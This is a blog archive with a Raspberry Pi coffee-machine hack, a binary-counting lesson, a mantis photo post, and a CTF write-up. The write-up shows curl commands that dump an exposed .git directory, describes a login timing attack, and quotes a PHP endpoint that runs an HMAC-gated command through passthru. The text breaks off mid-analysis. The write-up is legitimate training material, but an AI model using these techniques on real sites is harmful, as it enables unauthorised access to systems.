The more I laid out the structure and architecture of the app, I found it hard to get a really good overview of how the big picture is gonna look like and I found the way that data flows in Flutter pretty confusing. I heavily relied on Streams and the BLoC Pattern but that introduced many headaches you need to think about and left a bad taste in my mouth. Everything is so disjointed (which can be a good thing) but I found myself writing so much boilerplate code and spent way too much time thinking about the ways I need to work around the streams instead of working on logic for my app that I got frustrated in the end.

Don't get me wrong though, Streams are a cool concept and I see the value in them. Now in hindsight I'd build the app in a different way though. I think it'd be considerably easier with a single source of truth like a Redux Store.

This is why next time you're in for a treat! We're gonna get technical.

What's next

Please keep in mind that this article-series is just for fun and won't be receiving consistent updates. It'll probably be quite a while until the next installment.

I generally plan to release posts after I fixed some bugs, improved the code and implemented something new that's worth showing. This ensures that every post is interesting on it's own instead of little updates that noone really cares about. For this post I let pretty much all of the technical details out and didn't show code. I think I want to change that up next time. Ready yourselves to dive into some code ;)

Did you enjoy this?

Please reach out and tell me what you think. Would you like to see more, would you like to see something implemented or are you interested in something specific?

Thanks for your time, cheers.

- Daniel Biegler

How to hack your coffee machine to serve you via WiFi

Daniel Biegler — Tue, 02 Jul 2019 18:49:00 +0000

Here's the end result:

Here's how it works:

Hardware used / What you need
Decide on functionality
Identify which connections need soldering
Figure out how a relay board works
Figure out how to control the relay board
Decide where to put the Raspberry Pi
Begin soldering
Setup needed software
Connecting coffee machine to relay
Closing words
Comments

Hardware used / What you need

Raspberry Pi Zero W

I personally used a Raspberry Pi Zero with a Wi-Fi USB dongle. I'd recommend the Raspberry Pi Zero W though.

Wires
Relay Board/s
Soldering iron
Optional:

Mechanical Switch
Power Socket
Drill

Step 1:
Decide on functionality

For starters, unscrew your machine and find out how the buttons interact with the main circuit board.

Here you can see that the buttons in the front, feed the main circuit board with information via these connections

Behold the front i.e. the user interface

The whole theory for this project is that we're going to programmatically press buttons.

With hardware, you have a physical button, which looks like this

When you press the button down, you close the circuit which enables the charge to move.

This is cool, because simply adding another "button" is all we need, see here

This way it doesn't matter which button you're pressing, be it the physical button on the machine or our future digital "button"; Both buttons may complete the circuit!

This second "button" will be our relay board.

For this project, I decided that I'm only interested in controlling the following three buttons:

On/Off
Brew one cup
Brew two cups

Decide for yourself what kind of functionality you're interested in.

Step 2:
Identify which connections need soldering

I decided that this is a step I should take early on to rule out possible problems with the board. The connections might be obstructed by hot glue for example.

Turn the user interface board around and identify the specific lanes.

Some tracing later and I identified all the info I need. One wire to each colored line plus one for ground (GND).

Notice how the three buttons are connected to the same GND, the black line. This means we only need a single wire for the GND instead of wiring up each button individually, cool!

Step 3:
Figure out how a relay board works

A relay is basically just an electrically operated switch.

Let charge move through a control pin and the switch flips. Here's a short video, made by Simon A. Eugster

If we connect such a relay to a button on our coffee machine, we can electrically control it!

Step 4:
Figure out how to control the relay board

The Raspberry Pi has these so called general purpose input/output pins. (short: GPIO pins)

They look like this:

We're going to use the output pins on our Pi to electrically control the relay, which then will control the coffee machine. Remember the diagram in the beginning, here:

How do we interact with a GPIO pin?

The Raspberry Pi is running Linux which means "Everything Is A File"; In other words, you can control the GPIO pins simply by writing to a file. Don't worry, I published my code and will walk you through it. More on the specifics later.

How do we tell the Pi when to flip the pin (relay)?

I came up with a simple REST API which means that the Pi will be waiting for a specific network request and act accordingly, either doing what it's told or reporting back an error.

Three buttons want to be controlled, so the Pi will be listening for these three instructions:

Command	Action
cups=1	Brew 1 cup.
cups=2	Brew 2 cups.
power=toggle	Toggle power.

Having such an interface makes it possible to create multiple different ways of interacting with the Pi; Meaning, having a device that can send network requests (Your desktop, laptop, tablet, phone, watch, ..) enables you to interact with the coffee machine!

How do we send a network request?

I found building a little website the most intuitive approach for interaction since then also other people in my network can use this service. You could decide on something different here.
(Scripting comes to mind)

Step 5
Decide where to put the Pi

Your Pi has to reside either in or outside of the coffee machine. I opened up the back and luckily found plenty of space to work with.

I do not own a case for the Pi so some sort of backplate would be nice to have. Some plastic from the basement will do. Drill some holes, turn some screws et voilà:

Sticking it onto the back wall seemed reasonable enough:

Step 6:
Begin soldering

Relay boards generally need a pin for power (VCC), another pin for ground (GND) and one pin for each channel. I want to control three buttons so I need five pins in total. I marked them here:

Here are the pins that I used

After soldering and powering up your Pi, it should look similar to this:

Notice the three shining LEDs, they're indicating the state of the relays. They are ON by default and have to be turned OFF after booting your Pi. This task will be automated via a startup script; More on that later.

Sidenote:
At this point in the project everything was new to me, so I tried toggling the relays manually. For this tutorial I'll be getting into the technical stuff later on. If you're familiar with Bash and already want to play around with it, consult my initialization script.

The Pi's done, on to the coffee machine.

Remember the traced board:

After soldering it should look similar to this:

Cool, progress! You may need to extend your wires depending on how big your coffee machine is. Mine reach from the front to the back like so:

Depending on how you want to provide power to your Pi you might be done soldering now!

My father suggested that you could use the same power that drives the coffee machine to also power the Pi. This way no external cable would be visible, which is pretty neat if you ask me!

WARNING: I'd suggest only doing this if you truly know what you're doing! Working with such high voltages is dangerous. Only attempt this if you know what you're doing.

We put a small power socket inside the coffee machine which holds a run of the mill AC to DC USB Adapter. This adapter then powers the Pi via USB. See here:

To be able to turn the Pi ON or OFF a little mechanical switch was used. The white socket has two cables going out from it. One of it needs to go into the mechanical switch and the other one into the coffee machine.

Identify where the machine draws power from by looking for a PROBABLY brown, blue and a yellow+green cable. (Check the colours for your region, these colours are only true for Europe!)

Connect the power socket cables to the brown and blue cable like in the following image. It doesn't matter which specific cable of the power socket goes into the blue or brown one.

Cut a hole for the switch and enjoy the hidden goodness.

Step 7
Setup needed software

Note:
All my code for this project can be found here.

I coded the aforementioned REST API in some basic PHP, because a webserver with PHP support was already installed on my Pi.

As webserver (+ PHP) one has a couple of options to choose from, there are neat little articles from the Raspberry Pi Foundation itself. It really doesn't matter which one you'll choose, just pick one. For example you could go for NGINX or Apache. The process is pretty much the same and a "set-it-and-forget-it"-step.

Download and install, enable some stuff, done.

How exactly do we control the GPIO pins

The pins are represented as files on your Pi. You can find them in the /sys/class/gpio folder, see here:

$ ls /sys/class/gpio
export  gpiochip0  unexport

This folder is pretty interesting, in that there are two special files, export and unexport.

The export file sets up and enables the files of a specific pin.
The unexport file removes the created files.

A little example will help make clear how this works: You simply write the number of the GPIO pin into the export file, then you get access to the needed files. The only caveat is that by default you need root privileges because this is a system directory. For example I want to activate the 5th GPIO pin so I write the number 5 into export:

$ echo 5 > export
$ ls /sys/class/gpio
export  gpio5  gpiochip0  unexport

See how now there's an additional folder called gpio5! You can go inside and list its content via:

$ cd /sys/class/gpio/gpio5
$ ls
active_low  device  direction  edge  power  subsystem  uevent  value

Here are more special files that let you configure this pin. For us direction and value are interesting because with those two we could start controling our relay! Inspect the contents of the files via:

$ cat direction value
in
1

The current direction of this pin points in and its value is 1. Imagine hooking up an external device to this pin, this way you could establish communication between different systems by monitoring the value. Cool, right?

Our goal is to output charge to the relay, so we have to change to direction from in to out.

Simply write out to the direction file like so:

$ echo out > direction
$ cat direction value
out
0

See now the pin points outwards and has a value of 0. Super simple stuff. I was quite delighted when I tried this out for the first time because I had assumed that controlling hardware would be very finicky. All that's needed is simply writing either 1 or 0 to the value file. Who knew?

A little sidenote:
A distinction has to be made here, the export and unexport files expect not the literal pin number, but the GPIO pin number which is different. Let's stick to the example of GPIO pin number 5. On the following graphic you can see that the GPIO5 has the literal pin number of 29.

So yeah, keep that in mind.

Setup the GPIO pins we need

Like you've seen in the previous graphic I intend to use the GPIO pins 2, 3 and 4.
I wrote a script that does the steps of exporting, setting the direction, setting the value and permissions:

# Enable the needed pins.
echo 2 > '/sys/class/gpio/export';
echo 3 > '/sys/class/gpio/export';
echo 4 > '/sys/class/gpio/export';

# Change directions to "out".
echo 'out' > '/sys/class/gpio/gpio2/direction';
echo 'out' > '/sys/class/gpio/gpio3/direction';
echo 'out' > '/sys/class/gpio/gpio4/direction';

# Turn the pins off.
echo 1 > '/sys/class/gpio/gpio2/value';
echo 1 > '/sys/class/gpio/gpio3/value';
echo 1 > '/sys/class/gpio/gpio4/value';

# Change permissions so the webserver can write to the 'value'-files
chmod 777 '/sys/class/gpio/gpio2/value';
chmod 777 '/sys/class/gpio/gpio3/value';
chmod 777 '/sys/class/gpio/gpio4/value';

A reboot of the Pi resets the pins we previously exported so we need a startup service that re-enables them after booting up. I wrote this service which will run the initialization-script:

[Unit]
Description=Sets up the necessary files and permissions for the 2nd, 3rd, 4th GPIO pins to work.

[Service]
Type=oneshot
ExecStart=/bin/gpio_coffee_init.sh

[Install]
WantedBy=multi-user.target

Please notice how the service looks for the initialization script in the /bin folder /bin/gpio_coffee_init.sh. So prior to enabling this service you should move the gpio_coffee_init.sh into /bin via:

$ mv gpio_coffee_init.sh /bin

Then I also moved the service into /etc/systemd/system the same way via:

$ mv gpio_coffee_init.service /etc/systemd/system

After doing that you can try out if it works by starting the service via:

$ systemctl start gpio_coffee_init.service

This should set your GPIO pins up which you can check manually in the /sys/class/gpio directory, like so:

$ ls /sys/class/gpio
export  gpio2  gpio3  gpio4  gpiochip0  unexport

See, how the second, third and fourth pin got exported. Yay. If that's successful you can enable the service which means that it'll run on each startup of the Pi.

$ systemctl enable gpio_coffee_init.service

A quick recap

We have an initialization script which properly sets our pins up: Export them, setup direction, value and file permissions.
This initialization script gets automatically run after booting up the Pi.

I did this once and after months of use I had never the need to change anything here. It just works.™

Deploy the website

Alright, we got the hardware stuff out of the way. Time to deploy the website.

The website files will probably reside for you in /var/www/html. This folder depends on your Linux distro though, mine are for example in /srv/http. It doesn't really matter, just find out where your server looks for files via your search engine of choice.

You can find the code of my site here. Download it and move the index.php and the vendor folder to the directory where your webserver looks for pages. The index.php file contains the actual website and the vendor folder contains the 'graphics' so to speak. If you forget to also move the vendor folder, the site will look bare bones and broken is all I'm trying to say.

Sidenote:
I don't think it's necessary here to go through all of the sites code, is it? Shoot me a comment if you think otherwise.

I designed the site to be minimalistic and optimized for mobile displays. It should look like this when you open it in your browser:

Last but not least two little tricks to improve the quality of life when using this service:

You could change the device name of your Pi to something like 'coffee' so that you can access it more easily inside your home network. For example my FRITZ!Box Router allows me to connect to devices inside my network via URLs like: .fritz.box which in this case would make connecting really comfortable via coffee.fritz.box

In order to do this you simply write the name you want into the hostname file at /etc/hostname like so:

$ echo 'coffee' > /etc/hostname

Another cool little tip is that you could add this site to your homescreen. This way you can access your coffee with one simple tap on the icon. Chrome, Firefox and Safari all support this feature, find it in the settings while visiting a site.

The website in action

Assuming the software works like expected: Finally the magical moment of putting it all together is around the corner.

Step 8
Connecting coffee machine to relay

Connecting the relay to the coffee machine is easily done, here's a a little diagram I made:

In reality it looks something like this:

You should be done now.

Now your next coffee is only a click away!

For completeness' sake, take another look at the abstract diagram

and feel the pure bliss of operating a heavy machine with your fingertips:

Closing words

Thank you for reading through this mess. It's been my first hardware project and needed a lot of tinkering, trial and error. Looking back it seemed really daunting, but I enjoyed the road.

If you enjoyed this post, subscribing to my mailing list might be of interest to you. How about reading more about visualizing DNA and more.

Join the discussion about this post on Reddit!

Learn Interactively: Binary Code

Daniel Biegler — Tue, 21 May 2019 15:41:00 +0000

To understand how binary code works, you can look at its big brother first; The Decimal System.

We defined ten specific symbols to denote values.

You know this, easy enough.

But now think about how counting works. I hear you instinctively mumble 1, 2, 3, .. inside your head but let's define that a little more verbosely.

By "counting up" we mean incrementing a value by one unit.

0

9

By "counting down" we mean decrementing a value by one unit.

Alright, we can count now.

Exciting, I know!

That's great and all, but that's not enough. We need a mechanic for dealing with values higher than our highest symbol, because inventing new symbols for every single value is not practical.

From experience, you already know how to count into the two digit range but what exactly happens there? Again, let's be a little verbose and generic.

When you reach the highest possible symbol, wrap back around to the lowest symbol and increment the digit to your left.

0

7

> Go ahead and press the +1 button. Text is gonna get generated here.

I know that you know this, but really think about how the number grows, step by step.

I specifically tried to word this whole process as general as possible, so we can reuse it later when counting in binary. Before we do that however, let's take a smaller step.

Let's push the first boundary of our mind. Take a mental snapshot.

What would change if we'd remove the symbol '9' from our currently used numeral system?

Without '9' we are left with:

Easy enough, right?

Remember how we previously counted, let's do it again.

0

6

> Go ahead and press the +1 button. Text is gonna get generated here.

You should feel weird now, taken you've never done this before. If you grasp this concept however, you can count in pretty much any numeral system (including binary)!

Let's translate some numbers from this nonary (9 digits) numeral system to the more familiar decimal system.

Nonary		Decimal
0		0

Compare how the numbers grow. Hammer this point home:
When you reach the highest possible symbol, wrap back around to the lowest symbol and increment the digit to your left. See how this process works exactly the same for both systems.

We managed to reduce the number of possible symbols from ten to nine. It's time to reduce them even more, you're here to learn binary after all.

Go through the next examples thoughtfully and try to think of how the numbers will look - before - you change the value.

Symbols	Name	Value
5	Quinary	0
4	Quaternary	0
3	Ternary	0

10	Decimal	0

By now, you should know why the numbers look the way they do. We're only one digit away from binary, are you ready?

Remember, this process works exactly the same way in binary; You just reach the highest symbol very quickly, so you need to wrap around really quickly as well.

Let's count the first three digits together, step by step.

Decimal		Binary
000		000

> We increment the most right digit by one unit, until we reach the highest symbol.

Practice: Small Numbers

Here are some numbers which you should try to translate, to check if you understood the material. Use anything (your mind, your fingers, paper or even the textbox itself) to keep track of the numbers.

Quick note: No leading zeros are needed!

Decimal		Binary
1

How to easily convert binary to decimal in your head

You've seen how counting works and the general concept behind binary, but it's probably still a bit foreign because counting to, for example, 22 is tedious and unintuitive.

Luckily, there's a really convenient property of the binary numeral system which you can use in your head!

Let's stick to the chosen example of the decimal number 22.

Create a sequence, or rather, table of numbers that equate to powers of two. It's considerably less scary than it sounds once you see it visually. Most people can deduce the missing number in the following sequence:


?	8	4	2	1

So far so good, now to the good part.

When you put a binary table beneath said sequence, you can simply add up all the numbers with a 1 underneath them.

Let's say that we have decimal numbers up to 16 i.e.

and we want to translate the following binary number: 10110
This results in the following table:

Decimal
16	8	4	2	1	= 22

1	0	1	1	0
Binary

Another example. This time 1011:

Decimal
16	8	4	2	1	= 11

0	1	0	1	1
Binary

Here's an interactive table to see it in action.

Decimal
16	8	4	2	1	= 0

0	0	0	0	0
Binary

Process: Head conversion

The thought process when trying to translate a decimal number to binary is easiest performed from left to right. Let's, say that we want to find the binary number for '19'.

Start with the largest power-of-two-number that will fit in.

32? No, too big.
The next smaller one; 16? Yes, a match!
Put a '1' down and construct the table, left to right.

Decimal
16	8	4	2	1	= 16

1
Binary

Your goal now is to find the numbers that add up to '19'. There a few ways, my personal thought process works like this:

Now (19-16) equals 3, so we try to match 3 going forward.

The next smaller one; Does 8 fit into 3? No, 8 is bigger than 3.
Put a '0' down.

Decimal
16	8	4	2	1	= 16

1	0
Binary

The next smaller one; Does 4 fit into 3? No, 4 is bigger than 3.
Put a '0' down.

Decimal
16	8	4	2	1	= 16

1	0	0
Binary

The next smaller one; Does 2 fit into 3? Yes! 2 is smaller than 3.
Going forward we're trying to match 1 now, because (3-2) equals 1.
Put a '1' down.

Decimal
16	8	4	2	1	= 18

1	0	0	1
Binary

The next smaller one; Does 1 fit into 1? Yes (of course), we're done.
Put a '1' down.

Decimal
16	8	4	2	1	= 19

1	0	0	1	1
Binary

Do this a couple of times and it will become easier.

Equipped with your new knowledge and some practice you should be able to decipher larger binary numbers! Here's a similar exercise like before, but with bigger numbers:

Quick note: No leading zeros are needed!

Decimal		Binary
1

Afterword

Thank you very much for reading!

If you're not quite getting it, please let me know where you got stuck.

My main goal with this post is helping you understand how our numeral systems work. If you understood the material, you should be able to count in other bases as well. For example, I mentioned Ternary (base 3), which has real world use cases like expressing the state of CMOS circuits (and more).

There's also hexadecimal (base 16) which is very widely used in computers for displaying many different kinds of values, including color references, IP adresses, text, etc.

Please let me know if you enjoyed this article, I'm always looking for feedback to improve upon.

Mantis Matilda

Daniel Biegler — Tue, 21 May 2019 15:00:00 +0000

It feels to me that there's this odd, specific elegance to the cold, calculated, silent stare of a praying mantis.

What is it thinking? To what level is it assessing the situation, reasoning?

An opaque gaze that feels approaching yet distanced, looming, scheming and yet - indifferent. It seems as though you are of no concern to the mantis. It's not judging, it's only observing and deciding to let the thoughts pass.

The head shape and big eyes can sometimes fool you into thinking that the mantis is 'smiling' but that is just us humans interpreting signals that aren't applicable to these wonderful creatures. The 'facial' expression stays the same, no matter the situation.

I've always loved insect shots but never had the means to take the picture that I had in my mind. After a long time of studying, deliberating and saving money I finally bit the bullet and bought a used DSLR. I can't afford a true macro lens as of yet, but I got the Tamron 70-300mm for a cheap 99€ (~$110 USD).

My end goal is to be able to shoot like Andres Moline, his work is incredible. Comparing yourself with such a highly skilled artist can be a trap because it's pretty discouraging seeing the masterpieces they produce while yours lack substance.

Knowing that, I'm trying to enjoy the road, not the destination.

And this is exactly why this picture of Matilda feels so special to me.

Taking the leap and trying to put yourself out there, knowing you might fail and regret doing so is a hurdle that I wanted to overcome. The following image of Matilda is my very first genuine attempt at that.

I tried to capture the curious yet neutral expression of Matilda.
This post is my tribute to her.

About Matilda

This beautiful creature lived beside me on my ficus for over a year, I raised her since she was this tiny:

It's the very first picture I took of her on my habanero chili plant.

Don't be fooled by her fragile looks though, she is brave and doesn't back down!

Before I got the picture that I wanted, I practiced other shots of her which led to her gathering some fans on reddit, more specifically the awwnverts community.

Thank you to everyone that commented and spread the love! It was genuinely appreciated, because bringing people joy is the goal I set for my art.

I hope in the future I'm able to look back on this canvas and tell myself that my journey started here.

Matilda got very old, approximately ~16 months, and died peacefully of old age.

I buried her in the soil of the first plant that she lived on.
Farewell, little one. ❤

Mantis Matilda
† 17.05.19

Troopers FUCSS CTF 2018 Writeup

Daniel Biegler — Tue, 04 Dec 2018 00:00:00 +0000

On the first of octobre 2018 the TROOPERS Conference tweeted this.

In short, TROOPERS generously give away a couple of free tickets to students that submit a motivational letter.

This year however, they added an additional technical challenge which features two missions.

Since I'd LOVE to go, I decided to polish my motivational letter with this writeup.

# How I solved the challenges

# 1. Access Denied
During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well. Since said entity is rather sloppy with their access controls we found an internet facing web interface. Go over to db.f••••••l.tech and see if you can gain access to the application.

# Reconnaissance

Let's have a look, open the target site.

Alright, nothing much to see from the outside.
A very useful thing to check for is the so called robots.txt. This is a convenient standard for telling web robots where to and where not to look.

Not all robots cooperate with the standard; email harvesters, spambots, malware, and robots that scan for security vulnerabilities may even start with the portions of the website where they have been told to stay out.

Source: en.wikipedia.org, as of 2018-10-05

For this we just append /robots.txt to the url.

User-agent: *
Allow: /humans.txt
Disallow: /

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

Something we can work with, nice.

While this is the "Robots exclusion standard", there's also an "inclusion standard" called Sitemaps. Those provide web robots with information on where to look for content. Earlier we saw that the robots.txt specifically disallows everything except for the /humans.txt, nontheless, it's always worth looking at the Sitemap.

Nevermind.

So let's take a look at the /humans.txt, the authors maybe dropped a hint there:

this NONSENSE is brought to you by
@hnzlmnn and @talynrae

Well. Maybe a hint, maybe not. /shrug

(either way, give 'em a nice tweet for creating these awesome challenges, will ya?)

Alright, before we continue with the disallowed sites from the robots.txt, let's investigate the root page first.



  
    
    
    
    FishBowl 0day Database
    
  
  
    
      
        
          
            Maintenance!
            
              Maintenance mode has been activated.

              Use the administrative interface to disable it.
            
          
        
      
    
    
      
        
          
          
          Fishbowl

Very concise, no comments that could help us, no JavaScript either. The only external thing is the CSS file. I won't post it here since it isn't as short as the HTML, but at first glance it doesn't hold any interesting information either - except for these two parts:

#registration-form {
  font-family: "Source Sans Pro", "Helvetica Neue", "Helvetica", sans-serif;
  width: 400px;
  min-width: 250px;
  margin: 20px auto;
  position: relative;
  border-radius: 2px;
  overflow: hidden;
}
#registration-form:after {
  ...

Alright, it seems there is/was a login form somewhere. That doesn't help us as of right now, there could have been something useful here though. Secondly there is this:

body.error {
  background-image: url("/static/images/children-593313.jpg");
}

body.noaccess {
  background-image: url("/static/images/chain-690088.jpg");
}

body.notfound {
  background-image: url("/static/images/adult-art-black-and-white-368855.jpg");
}

body.badrequest {
  background-image: url("/static/images/badrequest.jpg");
}

This info tells us more about the folder structure of the site. Maybe they misconfigured their server to let us traverse directories?

Was worth a try, I guess. The 404 Page doesn't hold anything of value either.

Now we exhausted the useful information inside the initial sites, but remember this:

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

What's interesting here is the user agent, Evil Imp/3.7, that gets mentioned in the beginning.

This is your user agent right now:

Websites can use this information to serve you different types of content. Just as a quick example, when your user agent mentions an older browser, sites might try to increase backwards compatibility by using older syntax in the HTM, JavaScript or CSS.

With this in mind, let's open the disallowed links normally.

/api leads us to

/admin redirects us to /login, which looks like this:

An interesting detail you'll notice when you type something in is the following:

Sites can request a specific format for input fields via the pattern attribute which, in our case, looks like this:

In the pattern .{32} the dot . is a wildcard, meaning any character fits, be it a letter, digit or special character. This tells the browser to automatically block passwords that are not exactly 32 characters long. You could, in theory, manually submit passwords that don't fit the pattern - sure. I'll take an educated guess here though and say that this is probably not the intended solution.

# Time to become Evil

What do those sites look like when we use the aforementioned user agent of Evil Imp/3.7?

In Chrome/Chromium you can change your user agent by opening the Developer Tools (press F12) and switching to the Network Tab. In the three-dot-menu you can find the Network conditions option.

This'll let you specify your user agent like so:

Back to checking out the site.

The index page /, /api, /admin and /login all return

Finally! Our first little 'win', as in, our first proper clue!

.git here refers to the popular version control software Git.

To summarise quickly for those that are not very familiar with this technology, Git basically helps people and robots keep track of changes to files. It stores information regarding when was which file changed, what was changed, by whom and for what reason.

Figuratively speaking, this information makes attackers salivate.

# Investigate `/.git/`

Since every page now returns the beautiful Rainbow-Imp-Animation, it's time to remove our custom user agent from earlier.

Problem is that we get greeted by

when we try to access /.git/ because directory traversal was deactivated (remember earlier).

So what happens if we don't want to traverse directories and we target a specific file inside the folder? Since Git got mentioned we can simply look up the internal file structure of Git via their documentation or the man page ( gitrepository-layout ).

HEAD
[...] a valid Git repository must have the HEAD file; [...]

Source: git-scm.com, as of 2018-10-05

So let's simply check via cURL:

curl https://db.fishbowl.tech/.git/HEAD
ref: refs/heads/master

Bingo!

Non-directory-files don't seem to be forbidden!

Remember that Git can also track why changes were made. One can write about their changes in the so called commit message, which is stored in the COMMIT_EDITMSG file.

curl https://db.fishbowl.tech/.git/COMMIT_EDITMSG
Whooooopsie

Making your code involuntarily publically accessable can be a big whoopsie, yeah.

# Attack

By getting the individual pieces of the repository we could rebuild it locally and hopefully look up how the authentication at /login works.

So let's create a local repository and fill it with the data from the site.

mkdir repo && cd repo && git init
Initialized empty Git repository in /tmp/repo/.git/

So when we read the HEAD file, that told us that the currently active branch is called 'master'. This in turn enables us to look up the tip-of-the-tree commit objects of said branch.

curl https://db.fishbowl.tech/.git/refs/heads/master
9a932cc71e599ab95e588820d1dfeca8cc63313a

Now that we know the hash, let's try to get the corresponding object and pretty-print it:

mkdir .git/objects/9a
curl https://db.fishbowl.tech/.git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a > .git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a
git cat-file -p HEAD 
tree 87b769291b90999ec479f93f375cc13f3ed71a08
parent 4388a30f98f830b0baef344d631236feaacfb26f
author devops  1525277577 +0200
committer devops  1538218054 +0200

Whooooopsie

There we see the "Whooooopsie" again! We could even write a friendly E-Mail to the commit author. :-)

But more importantly are the tree and parent hashes, those allow us to find more files and commit messages. Let's get the parent.

mkdir .git/objects/9a
curl https://db.fishbowl.tech/.git/objects/43/88a30f98f830b0baef344d631236feaacfb26f > .git/objects/43/88a30f98f830b0baef344d631236feaacfb26f
git cat-file -p 4388a30
tree a66997e5f94a288b92c1c53a342ba95cee37edad
author devops  1518597252 +0100
committer devops  1538218054 +0200

Initial Commit

Hey, this one has no parent! Let's proceed with the first tree then

mkdir .git/objects/87
curl https://db.fishbowl.tech/.git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08 > .git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08
git cat-file -p 87b7692 
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt

Here we can see that a readme.txt is stored in that tree. Grab it!

mkdir .git/objects/d5
curl https://db.fishbowl.tech/.git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e > .git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e
git cat-file -p d5d0d15
# TODO

Migrate codebase into version control system

Nothing interesting in the readme.txt. Next tree.

mkdir .git/objects/a6
curl https://db.fishbowl.tech/.git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad > .git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad
git cat-file -p a66997e
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt
100644 blob 9102077ff36290750e5af1551c7a9bad090ec59b    secret.txt

Aaaah, secret.txt sounds interesting.

mkdir .git/objects/91
curl https://db.fishbowl.tech/.git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b > .git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b
git cat-file -p 9102077
[REST in Pieces]
    rtfm(hash_hmac)
[Access Denied]
    it's definitely NOT SQLi
    Take your TIME

Yeahhhhh...

I guess the hint that it's "NOT" SQL Injection is nice to have..

I want to be honest here, I was pretty dissappointed when reading the secret.txt and tried coming up with a new approach for a whole hour.

With nothing left to see inside the /.git/ folder, I just dabbled with the /login page for a while which looked like this:

I was wondering why it specifically says that the username is invalid instead of something more generic. So naturally I tried to look for a different error message by trying out usernames like:

'root',
'Fishbowl',
'Evil Imp/3.7'

and last but not least:

'admin'.

Another puzzle piece found!

What I so far didn't mention specifically, is that I monitored the response headers of my login-tries to get a better understanding of the whole login-process. Which luckily resulted in me noticing some curious new response from the server!

Normally the server responds, amongst other things, with these:

...
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

After trying with the 'admin' user, suddenly this new header sneaked in:

...
X-Content-Type-Options: nosniff
X-DBQuery-Perf: 6ms
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Remember the challenge description?

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well.

Database Query Performance? 'Take your TIME'?

Oh my, a Timing Attack!?

By measuring the time it takes the server to process our query, we can guess the correctness of our query!

Let's say we have a server that validates a passphrase. Said server goes from left to right and needs 1 second per character.

Comparing 'ABCD' and 'ABXD':

(I made this graphic myself, do you like it? Let me know!)

Notice how we didn't compare the two 'D' characters? As soon as we see a non-matching character, we stop the comparison. This is problematic.

This allows attackers to estimate the correctness of the provided passphrase by measuring the time. The longer the comparison takes, the better!

Sidenote:
This example is pretty drastic because comparing a single character almost never takes a whole second, but don't dismiss this attack. It is a real attack vector which you should look out for, see this paper from the Blackhat Conference in 2015 by Timothy D. Morgan and Jason W. Morgan.

So let's put this theory to the test by doing a couple of requests per character and averaging them afterwards. (I chose to do this in Python with the requests library, more on the specifics later.)

Now if that is not suspicious, I don't know what is. Let's try using the found 'S' and appending a second character.

It seems like the first character 'S' might be correct, every single response took at least 200ms. It also seems like the second character is '0' (zero).

With these findings, it looks like a correct character adds approximately 200ms response time. If we look for the third character, our worst case time complexity amounts to roughly

400ms per character
* 99 printable ascii characters
+ 600ms for the found character
= 40200ms * n-retries
= 40,2 seconds * n-retries

This is starting to look pretty uncomfortable, especially if you keep in mind that this is only the third character out of 32.

Adding the sequential tries amounts to a worst case of +165 minutes with 1 request per character.

This doesn't sound impossible, but uncomfortable nontheless. We could speed it up by making multiple requests simultaneously, but first let's try to deepen our knowledge of how the comparison works.

What happens if the first character is wrong while the second character is correct?

NICE. This means we don't have to include prior found characters, which results in drastically reduced worst case time complexities. Optimistically this results in:

20ms per character
* 99 printable ascii characters
+ 200ms for the found character
= 2.18s * 32 for every character
= 1.16min * n-retries

Only a minute, that's over a 99% time improvement, when compared with the naive bruteforce from before.

Here is my timing attack in action. (video is sped up)

Logging in with 'admin' and our newly found password, we finally reach our goal.

Code used for the timing attack can be found here.

This concludes the first challenge. Take a breather, this has been quite the extensive writeup.

If you enjoyed this you might enjoy my other article about learning binary code interactively.

Anyways, on to the next challenge:

2. REST in Pieces
Our insider intern discovered an unauthenticated API endpoint within the database appliance. Along with this information we were able to exfiltrate a code snippet of this endpoint. You can find it on kleber.io or pastebin. Locate and examine the endpoint.

This challenge is a little different. Here we are provided with the following code snippet (you don't have to study it completely yet, I'll go over it - step by step):


 * @endpoint   /api/vegan/rest
 * @license    MIT
 * @version    1.0
 */

require_once("../../libs/tomato.php");

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	error(400);
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
	error(400);
}

if (!empty($command['nonce'])) {
	$secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}

passthru($command['action']);

# Reconnaissance

First of all, let's check out the mentioned API endpoint and see what we're dealing with.

Judging from the code I guess this is supposed to resemble a tomato. Let's send another request.

Oh, you get different facts about the tomato. Neat.

Inside the response headers we see a juicy status code

Request URL: https://db.fishbowl.tech/api/vegan/rest
Request Method: GET
Status Code: 400 Tomato

Which makes sense if we go through the source.

$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	error(400);
}

If we do not provide an action, we error out with a 400 status code. To verify that we indeed have the proper file, I'd suggest trying to reach the 401 status code.

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}

For this, we need to check where all the variables, i.e. algo, action, secret and hash, are being set.

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
